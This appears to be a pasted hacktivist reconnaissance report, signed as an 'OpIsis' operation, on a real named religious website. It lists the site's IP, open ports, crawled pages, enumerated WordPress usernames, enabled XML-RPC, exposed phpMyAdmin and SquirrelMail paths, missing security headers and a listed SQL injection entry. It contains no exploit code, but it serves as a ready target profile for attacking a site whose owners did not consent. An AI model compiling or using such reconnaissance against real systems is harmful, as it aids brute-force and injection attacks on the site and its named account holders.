- [INFO] DNS enumeration:
- [*] ftp.tevhididavet.com 93.89.20.20
- [*] mail.tevhididavet.com 93.89.20.20
- [INFO] Possible abuse mails are:
- [*] abuse@internetadresi.com
- [*] abuse@tevhididavet.com
- [INFO] NO PAC (Proxy Auto Configuration) file FOUND
- [ALERT] robots.txt file FOUND in http://tevhididavet.com/robots.txt
- [INFO] Checking for HTTP status codes recursively from http://tevhididavet.com/robots.txt
- [INFO] Status code Folders
- [*] 200 http://tevhididavet.com/wp-admin/
- [INFO] Starting FUZZing in http://tevhididavet.com/FUzZzZzZzZz...
- [INFO] Status code Folders
- [*] 200 http://tevhididavet.com/images
- [ALERT] Look in the source code. It may contain passwords
- [INFO] Links found from http://tevhididavet.com/ http://93.89.20.20/:
- [*] https://www.facebook.com/Tevhididavetcom
- [*] https://www.instagram.com/tevhididavetcom/
- [*] https://www.youtube.com/watch?v=3zDjkL5PRVA
- [*] http://tevhididavet.com/
- [*] http://tevhididavet.com/allaha-isyan-olacak-seyleri-emretmedigi-surece-ulul-emre-itaat-etmek/
- [*] http://tevhididavet.com/allahin-sifatlarini-kullarda-gormek/
- [*] http://tevhididavet.com/author/abdullahsaid/
- [*] http://tevhididavet.com/author/esedullahsaid/
- [*] http://tevhididavet.com/casiye-suresi-1-3-ayetlerin-tefsiri/
- [*] http://tevhididavet.com/comments/feed/
- [*] http://tevhididavet.com/dort-mezhebe-gore-oruc-fikhi/
- [*] http://tevhididavet.com/feed/
- [*] http://tevhididavet.com/fikih-usulunun-tanimi-ve-hakikati/
- [*] http://tevhididavet.com/fitir-sadakasi-kime-verilir/
- [*] http://tevhididavet.com/gunluk-zikirler/
- [*] http://tevhididavet.com/gunluk-zikirler-estagfirullahe-ve-etubu-ileyh/
- [*] http://tevhididavet.com/gunluk-zikirler-la-ilahe-illallahu-vahdehu-la-serike-leh/
- [*] http://tevhididavet.com/gunluk-zikirler-subhanallahi-ve-bihamdihi-subhanallahil-azim/
- [*] http://tevhididavet.com/ihsan-nedir/
- [*] http://tevhididavet.com/iletisim/
- [*] http://tevhididavet.com/internet-uzerinden-doviz-alip-satmak-caiz-midir/
- [*] http://tevhididavet.com/irfan-mektebi/
- [*] http://tevhididavet.com/kategori/ahlak/
- [*] http://tevhididavet.com/kategori/akaid/
- [*] http://tevhididavet.com/kategori/arabca/
- [*] http://tevhididavet.com/kategori/edebiyat/
- [*] http://tevhididavet.com/kategori/fikih/
- [*] http://tevhididavet.com/kategori/kuran/
- [*] http://tevhididavet.com/kategori/makaleler/
- [*] http://tevhididavet.com/kategori/onsayfa/
- [*] http://tevhididavet.com/kategori/sohbetler/
- [*] http://tevhididavet.com/kategori/sorucevab/
- [*] http://tevhididavet.com/kategori/sorucevab/akaid-sorulari/
- [*] http://tevhididavet.com/kategori/sorucevab/fikih-sorulari/
- [*] http://tevhididavet.com/kategori/sunnet/
- [*] http://tevhididavet.com/kimler-adina-fitir-sadakasi-fitre-vermek-gereklidir/
- [*] http://tevhididavet.com/muslumanlara-karsi-kafirleri-destekmek/
- [*] http://tevhididavet.com/page/2/
- [*] http://tevhididavet.com/rasullere-iman-nedir-nasil-edilir/
- [*] http://tevhididavet.com/sabir-nedir/
- [*] http://tevhididavet.com/sahih-fitir-fitre-sadakasi-fikhi/
- [*] http://tevhididavet.com/seri-deliller/
- [*] http://tevhididavet.com/sidk-nedir/
- [*] http://tevhididavet.com/soru-bir-kimse-sevval-ayinda-tutulan-6-gunluk-orucu-oruc-tutulmasi-pazartesi-ve-persembe-gunleri-gibi-mustahab-olan-gunlerde-tutsa-alacak-oldugu-ecir-artar-mi/
- [*] http://tevhididavet.com/sorularla-iman-kavrami/
- [*] http://tevhididavet.com/sorularla-kufur-kavrami/
- [*] http://tevhididavet.com/soru-seri-ozurler-sebebiyle-ramazan-orucundan-eksigi-olan-bir-kimse-sevval-ayinin-6-gun-olan-orucunu-tutabilir-mi/
- [*] http://tevhididavet.com/soru-sevval-ayindan-alti-gun-oruc-tutmanin-hukmu-nedir/
- [*] http://tevhididavet.com/soru-sevval-ayinin-6-gun-olan-orucunu-ara-ver-meden-pes-pese-tutmak-sart-midir/
- [*] http://tevhididavet.com/soru-sevval-ayi-orucunu-terk-eden-bir-kimse-gunahkar-olur-mu/
- [*] http://tevhididavet.com/subhanallahi-ve-bihamdihi-zikrinin-fazileti/
- [*] http://tevhididavet.com/sukur-nedir/
- [*] http://tevhididavet.com/tagutlara-destek-olmak-2/
- [*] http://tevhididavet.com/tagut-nedir-nasil-reddedilir/
- [*] http://tevhididavet.com/tekfir-nedir/
- [*] http://tevhididavet.com/tevhid-nedir-2/
- [*] http://tevhididavet.com/zikrin-faydalari/
- [*] http://twitter.com/tevhididavetcom
- [*] http://www.tevhididavet.com/
- [*] http://www.youtube.com/tevhididavet
- [INFO] Shodan detected the following opened ports on 93.89.20.20:
- [*] 1
- [*] 110
- [*] 143
- [*] 22
- [*] 4
- [*] 443
- [*] 53
- [*] 80
- [*] 993
- [*] 995
- [INFO] ------VirusTotal SECTION------
- [INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
- [INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
- [INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
- [INFO] ------Alexa Rank SECTION------
- [INFO] Percent of Visitors Rank in Country:
- [INFO] Percent of Search Traffic:
- [INFO] Percent of Unique Visits:
- [INFO] Total Sites Linking In:
- [*] Total Sites
- [INFO] Useful links related to tevhididavet.com - 93.89.20.20:
- [*] https://www.virustotal.com/pt/ip-address/93.89.20.20/information/
- [*] https://www.hybrid-analysis.com/search?host=93.89.20.20
- [*] https://www.shodan.io/host/93.89.20.20
- [*] https://www.senderbase.org/lookup/?search_string=93.89.20.20
- [*] https://www.alienvault.com/open-threat-exchange/ip/93.89.20.20
- [*] http://pastebin.com/search?q=93.89.20.20
- [*] http://urlquery.net/search.php?q=93.89.20.20
- [*] http://www.alexa.com/siteinfo/tevhididavet.com
- [*] http://www.google.com/safebrowsing/diagnostic?site=tevhididavet.com
- [*] https://censys.io/ipv4/93.89.20.20
- [*] https://www.abuseipdb.com/check/93.89.20.20
- [*] https://urlscan.io/search/#93.89.20.20
- [*] https://github.com/search?q=93.89.20.20&type=Code
- [INFO] Useful links related to AS44922 - 93.89.20.0/24:
- [*] http://www.google.com/safebrowsing/diagnostic?site=AS:44922
- [*] https://www.senderbase.org/lookup/?search_string=93.89.20.0/24
- [*] http://bgp.he.net/AS44922
- [*] https://stat.ripe.net/AS44922
- [INFO] Date: 22/06/19 | Time: 19:21:04
- [INFO] Total time: 1 minute(s) and 43 second(s)
- #######################################################################################################################################
- [-] Date & Time: 22/06/2019 19:14:53
- [I] Threads: 5
- [-] Target: http://tevhididavet.com (93.89.20.20)
- [M] Website Not in HTTPS: http://tevhididavet.com
- [I] Server: Apache/2
- [L] X-Frame-Options: Not Enforced
- [I] Strict-Transport-Security: Not Enforced
- [I] X-Content-Security-Policy: Not Enforced
- [I] X-Content-Type-Options: Not Enforced
- [L] Robots.txt Found: http://tevhididavet.com/robots.txt
- [I] CMS Detection: WordPress
- [I] Wordpress Version: 5.2.2
- [I] Wordpress Theme: spixer
- [-] WordPress usernames identified:
- [M] Esedullâh Saîd el-Muallim
- [M] abdullahelesrefi
- [M] abdullahsaid
- [M] abdurrezzak
- [M] ademelesrefi
- [M] bdullâh Saîd el-Müderris
- [M] esedullahsaid
- [M] hasansalih
- [M] mfurkansaid
- [M] muhammedelemin
- [M] muhammedsahan
- [M] mustafabsezgin
- [M] osmanettalib
- [M] spixerthemes
- [M] tevhididavet
- [M] XML-RPC services are enabled
- [I] Autocomplete Off Not Found: http://tevhididavet.com/wp-login.php
- [-] Default WordPress Files:
- [I] http://tevhididavet.com/license.txt
- [I] http://tevhididavet.com/readme.html
- [I] http://tevhididavet.com/wp-content/themes/twentynineteen/readme.txt
- [I] http://tevhididavet.com/wp-includes/ID3/license.commercial.txt
- [I] http://tevhididavet.com/wp-includes/ID3/license.txt
- [I] http://tevhididavet.com/wp-includes/ID3/readme.txt
- [I] http://tevhididavet.com/wp-includes/images/crystal/license.txt
- [I] http://tevhididavet.com/wp-includes/js/plupload/license.txt
- [I] http://tevhididavet.com/wp-includes/js/swfupload/license.txt
- [I] http://tevhididavet.com/wp-includes/js/tinymce/license.txt
- [-] Searching Wordpress Plugins ...
- [I] feed
- [M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
- [I] Checking for Directory Listing Enabled ...
- [-] Date & Time: 22/06/2019 19:28:36
- [-] Completed in: 0:13:43
- #######################################################################################################################################
- Parsero scan report for tevhididavet.com
- http://tevhididavet.com/wp-admin/ 302 Found
- [+] 1 links have been analyzed but any them are available...
- Finished in 2.63480806350708 seconds
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 93.89.20.20
- + Target Hostname: 93.89.20.20
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /C=US/ST=Someprovince/L=Sometown/O=none/OU=none/CN=localhost/emailAddress=webmaster@localhost
- Ciphers: ECDHE-RSA-AES128-GCM-SHA256
- Issuer: /C=US/ST=Someprovince/L=Sometown/O=none/OU=none/CN=localhost/emailAddress=webmaster@localhost
- + Start Time: 2019-06-22 20:17:04 (GMT-4)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache/2
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The site uses SSL and Expect-CT header is not present.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Apache/2 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
- + Hostname '93.89.20.20' does not match certificate's names: localhost
- + Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
- + Uncommon header 'x-dns-prefetch-control' found, with contents: off
- + Uncommon header 'x-ob_mode' found, with contents: 1
- + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /pma/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + Cookie SQMSESSID created without the secure flag
- + Cookie SQMSESSID created without the httponly flag
- + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
- + OSVDB-3268: /icons/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- + OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /pma/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + 8856 requests: 4 error(s) and 21 item(s) reported on remote host
- + End Time: 2019-06-22 23:02:02 (GMT-4) (9898 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- Anonymous JTSEC #OpIsis Full Recon #22
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement